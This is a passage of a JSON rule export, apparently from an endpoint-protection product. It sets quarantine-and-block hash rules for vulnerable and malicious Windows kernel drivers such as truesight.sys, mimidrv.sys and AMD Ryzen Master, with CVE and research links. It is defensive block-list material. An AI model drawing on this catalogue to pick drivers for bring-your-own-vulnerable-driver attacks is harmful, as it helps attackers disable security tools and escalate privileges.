"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974950Z", + "creation_date": "2026-03-23T11:45:29.974953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c1b6a278ff90171a7472423a2626edcf75233aacac1bd7d1995716ef26f8dcf", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f829a8fc-6652-5c1c-9625-de753d8e5919", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833318Z", + "creation_date": "2026-03-23T11:45:30.833321Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833330Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65ba545cef6077b62d96207252ffaea4e12bb93d37e5d2c2a9725fc54fb3874f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f83880bf-eb60-5877-b11b-4f07dde5b40f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492285Z", + "creation_date": "2026-03-23T11:45:31.492287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbd09c3feb1b5c77fd0aaaa3c43bf320a29a3230f1d8eaab4804d02d432e7822", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f83a7557-f594-583c-8346-4a481722d1af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147622Z", + "creation_date": "2026-03-23T11:45:31.147624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa8c60175aaf470608e4f198c57cf0f4deef6dd9558dd6d512ae3f71a347a11d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f852f38c-c0aa-548c-a7c0-df05a047debd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480967Z", + "creation_date": "2026-03-23T11:45:30.480969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"4c807bacfcf5c30686e26812ec8d5581a824b82fee7434260c27c33eee2dfbe2", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f86023c0-a963-5c0d-87b1-1e54a73b4f35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466720Z", + "creation_date": "2026-03-23T11:45:30.466723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466732Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f869ff1c-388e-5d6b-a145-ae2b90f72d5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.608335Z", + "creation_date": "2026-03-23T11:45:29.608336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3111f4d7d4fac55103453c4c8adb742def007b96b7c8ed265347df97137fbee0", + "comment": "Vulnerable Kernel Driver (aka EnPortv.sys) [https://www.huntress.com/blog/encase-byovd-edr-killer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f874ec6f-7cd7-53b9-a3f5-35e7df459bbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615913Z", + "creation_date": "2026-03-23T11:45:29.615917Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615922Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c84806a49da944c20a01e7dba7721e88859a5f65ec338ddb5da3a0d6895e7268", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f878c79e-4f66-5bb6-a30d-484b22f03095", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829519Z", + "creation_date": "2026-03-23T11:45:30.829521Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d128c50214a5b6c3da6c85537974ff31ef44be4bcc3cc549fb1e6986eb8bf5d2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f878d0a6-1c02-58b4-a105-3297a095e71c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147483Z", + "creation_date": "2026-03-23T11:45:31.147485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.147490Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0923bd21d9c36c4190536db1f8adde19161988d0a66471b002fb1b4df70fae2a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f87c4d78-9e91-5c97-b5d8-7b495888c0b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973025Z", + "creation_date": "2026-03-23T11:45:29.973026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9679758455c69877fce866267d60c39d108b495dca183954e4af869902965b3d", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f87e8c6f-d909-5ba6-bcfb-90c512429a89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816174Z", + "creation_date": "2026-03-23T11:45:30.816175Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0c52425dd90f36d110952c665e5b644bb1092f952942c07bb4da998c9ce6e5b", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8817a8c-2f14-5305-a925-839a0d3d0afb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829995Z", + "creation_date": "2026-03-23T11:45:31.829997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830003Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ec0bf9819b63141cdf8f24415648a234ac220e28fa801c330a6bc9f954ee411c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f88e348a-46c6-54b5-9941-1f945fb3429c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155575Z", + "creation_date": "2026-03-23T11:45:31.155577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4add50747f10a3e9aceba7e52b26c4af95bebdfabfa5c9b5a10ed31adb8af823", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f88f0493-5201-598b-ae0a-9ae0d9d84321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975394Z", + "creation_date": "2026-03-23T11:45:29.975396Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ddc5ff33a19baf1630a92723b5d0103fcc9ca58ee2a548526b9439eec3c97fe8", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8933aca-9712-50c8-8158-dafe3d71bc7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618531Z", + "creation_date": "2026-03-23T11:45:29.618533Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"3cee638c546efe5bd23880da9fa2b90e8dd0fd4a228fb0ad96f6c11d47a52593", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f89e0881-d4b5-58c8-ac08-863426404a29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612439Z", + "creation_date": "2026-03-23T11:45:29.612441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612447Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecfc52a22e4a41bf53865b0e28309411c60af34a44e31a5c53cdc8c5733e8282", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8ade152-b018-5723-b95e-7d67d90d09de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474021Z", + "creation_date": "2026-03-23T11:45:31.474025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cc38edb6d2a12869cef4dbee74e8316f0df610b74fe26728094188c66eaa6cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8af7b62-56d6-59f7-98eb-92799aefc91e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829184Z", + "creation_date": "2026-03-23T11:45:30.829186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de4328d64c16df3d425ccd79c294016369784b8662a1de7891dfba556c720469", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8b0064e-c84a-56f1-861b-74bb4798413d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617678Z", + "creation_date": "2026-03-23T11:45:29.617679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "126719d008d106b7100ae47ed47666c1334701bd7ddb32d5b8e84048f258700f", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8cccdc4-ced6-5e08-a26d-249f38049ab3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.825423Z", + "creation_date": "2026-03-23T11:45:31.825425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "920b06859bfcff7484bf2a20d876bbcf1a6d65f8c72050afa388848ad01767e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8ce1ea4-9aab-502e-a73e-337ec869c3ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827525Z", + "creation_date": "2026-03-23T11:45:30.827527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3f8afc10771d473f9188d36e035bf96df394cb381c3f18b319f69f8648750e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8d1c31e-cdf4-54c7-a616-4787ff155945", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452515Z", + "creation_date": "2026-03-23T11:45:30.452518Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e42d8953f90e0b052adacd6c8e6cc240d723e5b4605ac897fe9667e661f9ed3c", + "comment": "Malicious Kernel Driver (aka c94f405c5929cfcccc8ad00b42c95083.sys) [https://www.loldrivers.io/drivers/ddefecdd-9410-46d9-8957-e23aac1aba0c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8d5b631-b174-53a1-accb-b55aaea18795", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821926Z", + "creation_date": "2026-03-23T11:45:31.821928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5fdf37acbd3e79bd58b41fb62b2f280d6a6c969b218ecab4bb279299f61adfd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8d8a329-d8e0-55a6-bdf0-f20da286c3d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479457Z", + "creation_date": 